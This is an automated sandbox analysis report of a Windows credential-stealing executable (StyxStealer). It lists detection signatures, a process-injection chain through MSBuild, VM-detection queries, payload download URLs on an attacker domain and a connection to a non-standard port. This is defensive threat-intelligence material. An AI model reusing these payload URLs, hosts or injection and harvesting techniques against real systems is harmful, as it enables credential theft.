Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ycj3d5NMhc.exe

Overview

General Information

Sample name:Ycj3d5NMhc.exe
renamed because original name is a hash value
Original sample name:c269ec6cc10cfa210817133e43becae40004a1ddb2220646cddf8a3165bf4269.exe
Analysis ID:1483417
MD5:10da3cc4689926de08a0ba47481acead
SHA1:37d4b0ce7114c0cc427705f35430656bc3d4c049
SHA256:c269ec6cc10cfa210817133e43becae40004a1ddb2220646cddf8a3165bf4269
Tags:exeinvestdirectinsurance-com
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Sigma detected: Silenttrinity Stager Msbuild Activity
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Ycj3d5NMhc.exe (PID: 2884 cmdline: "C:\Users\user\Desktop\Ycj3d5NMhc.exe" MD5: 10DA3CC4689926DE08A0BA47481ACEAD)
    • MSBuild.exe (PID: 5992 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • conhost.exe (PID: 1904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 4136 cmdline: "wmic" csproduct get UUID MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Ycj3d5NMhc.exe PID: 2884JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: MSBuild.exe PID: 5992JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            3.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Ycj3d5NMhc.exe.12689ac0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.Ycj3d5NMhc.exe.12689ac0.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 34.117.59.81, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 5992, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49709
                  No Snort rule has matched
                  Timestamp:2024-07-27T11:38:15.193643+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49718
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T11:37:37.062108+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49711
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T11:37:20.124935+0200
                  SID:2803270
                  Source Port:49708
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-07-27T11:37:19.091900+0200
                  SID:2803270
                  Source Port:49707
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Ycj3d5NMhc.exeReversingLabs: Detection: 23%
                  Source: Ycj3d5NMhc.exeVirustotal: Detection: 9%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: unknownHTTPS traffic detected: 104.21.65.79:443 -> 192.168.2.8:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49709 version: TLS 1.2
                  Source: Ycj3d5NMhc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\Outputs\Evop.pdb source: Ycj3d5NMhc.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 00EBA7FCh3_2_00EBA5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 00EBA80Fh3_2_00EBA5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 059D9ED4h3_2_059D9B28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ecx, dword ptr [ebp-000000C4h]3_2_059DAD6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h3_2_059DC19F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_059D3A88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_059D3A7E
                  Source: global trafficTCP traffic: 192.168.2.8:49710 -> 79.110.49.176:2233
                  Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                  Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                  Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownDNS query: name: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Zopi.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeCode function: 0_2_00007FFB4B05164D InternetReadFile,0_2_00007FFB4B05164D
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /assuence/litesolidCha/Zopi.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: investdirectinsurance.com
                  Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                  Source: MSBuild.exe, 00000003.00000002.1523018849.0000000002941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1487067677.00000000008A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/
                  Source: Ycj3d5NMhc.exeString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd4
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdP
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1487067677.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdj
                  Source: Ycj3d5NMhc.exeString found in binary or memory: https://investdirectinsurance.com/assuence/litesolidCha/Zopi.bd
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490876841.000000001B618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investdirectinsurance.com/m
                  Source: MSBuild.exe, 00000003.00000002.1523018849.0000000002941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002941000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1521055612.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/json
                  Source: MSBuild.exe, 00000003.00000002.1523018849.000000000298A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002986000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/missingauth
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: MSBuild.exe, 00000003.00000002.1525299232.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1525299232.0000000003BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownHTTPS traffic detected: 104.21.65.79:443 -> 192.168.2.8:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49709 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBD3C0 NtWow64QueryInformationProcess64,3_2_00EBD3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBDD94 NtWow64ReadVirtualMemory64,3_2_00EBDD94
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBD3B8 NtWow64QueryInformationProcess64,3_2_00EBD3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBA92A3_2_00EBA92A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBC2B03_2_00EBC2B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBE4F03_2_00EBE4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EB26F23_2_00EB26F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBD6D03_2_00EBD6D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EB1FF83_2_00EB1FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EB8FF73_2_00EB8FF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EB97823_2_00EB9782
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBE0613_2_00EBE061
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBE0703_2_00EBE070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBE4E03_2_00EBE4E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00EBD6C03_2_00EBD6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05923F503_2_05923F50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059268683_2_05926868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0592CBC83_2_0592CBC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05926FF83_2_05926FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05926FE83_2_05926FE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059994303_2_05999430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059958683_2_05995868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05997AB03_2_05997AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0599EAE83_2_0599EAE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059DD5983_2_059DD598
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D55F03_2_059D55F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D24B03_2_059D24B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D3CF23_2_059D3CF2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D7F483_2_059D7F48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059DBE883_2_059DBE88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D06F03_2_059D06F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D5E203_2_059D5E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D2E5F3_2_059D2E5F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D8E523_2_059D8E52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059DF8C03_2_059DF8C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D58C23_2_059D58C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D9B283_2_059D9B28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059DB3203_2_059DB320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D43483_2_059D4348
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D8A8F3_2_059D8A8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D0D903_2_059D0D90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059DD5893_2_059DD589
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D24A03_2_059D24A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059D06E03_2_059D06E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059DA6403_2_059DA640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059DBE783_2_059DBE78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059DC19F3_2_059DC19F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_059DD3783_2_059DD378
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490044573.0000000012689000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStyxStealer.exe8 vs Ycj3d5NMhc.exe
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1489951347.00000000026A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegh2q.dll4 vs Ycj3d5NMhc.exe
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1490715904.000000001AFC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamegh2q.dll4 vs Ycj3d5NMhc.exe
                  Source: Ycj3d5NMhc.exe, 00000000.00000002.1489951347.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStyxStealer.exe8 vs Ycj3d5NMhc.exe
                  Source: classification engineClassification label: mal96.spyw.evad.winEXE@7/5@2/3
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Victim_SID[1].bdJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1904:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
                  Source: Ycj3d5NMhc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Ycj3d5NMhc.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: MSBuild.exe, 00000003.00000002.1523018849.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1523018849.0000000002E10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Ycj3d5NMhc.exeReversingLabs: Detection: 23%
                  Source: Ycj3d5NMhc.exeVirustotal: Detection: 9%
                  Source: unknownProcess created: C:\Users\user\Desktop\Ycj3d5NMhc.exe "C:\Users\user\Desktop\Ycj3d5NMhc.exe"
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUIDJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Ycj3d5NMhc.exeSection loaded: ncryptsslp.dllJump to behavior
